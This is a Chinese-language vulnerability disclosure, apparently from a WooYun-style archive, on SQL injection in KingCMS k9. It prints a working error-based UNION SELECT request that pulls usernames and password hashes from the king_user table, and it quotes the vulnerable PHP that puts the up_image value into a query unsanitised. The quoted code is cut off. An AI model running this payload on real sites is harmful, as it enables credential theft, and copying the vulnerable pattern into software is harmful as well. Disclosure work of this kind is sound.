KingCms最新版(k9)注入一枚

- AV AC AU C I A
发布: 2025-04-13
修订: 2025-04-13

### 简要描述: KingCms最新版(k9)注入一枚 ### 详细说明: 朋友的公司想购买kingcms的授权,让我帮忙看下。发现kingcms很长一段时间没更新了,憋了一段时间放出了最新版的k9(2014-12-13更新),官网下下来学习一下。 在wooyun上看到了几个漏洞,如: [WooYun: kingcms最新版sql注入漏洞](http://www.wooyun.org/bugs/wooyun-2013-043520) 注入点:GET /images/index.php?jsoncallback=1&_=1&CMD=show&up_image=1003/**/UNION/**/SELECT/**/1/**/FROM(SELECT/**/COUNT(*),CONCAT(0x23,(SELECT/**/concat(username,0x23,userpass)FROM/**/king_user/**/LIMIT/**/0,1),0x23,FLOOR(RAND(0)*2))x/**/FROM/**/INFORMATION_SCHEMA.tables/**/GROUP/**/BY/**/x)a&AJAX=1 注入参数:up_image 问题文件在/images/index.php ``` function _show(){ if(empty($_POST['up_image'])) kc_tip('图片ID读取错误!'); $id=$_POST['up_image']; $db=new db; $rs=$db->getRows_one('%s_up_image','path','image='.$id); if(empty($rs)) kc_tip('图片丢失!'); //读取图片长宽尺寸 $size=@getimagesize(ROOT.PATH_UP.'/'.$rs['path']); $_width=$size[0]; $_height=$size[1]; $w=$_width; $h=$_height; $size=580; if($w>$size){ $w=$size; $h=round($size*($_height/$_width)); } if($h>$size){ $h=$size;...

0%
暂无可用Exp或PoC
当前有0条受影响产品信息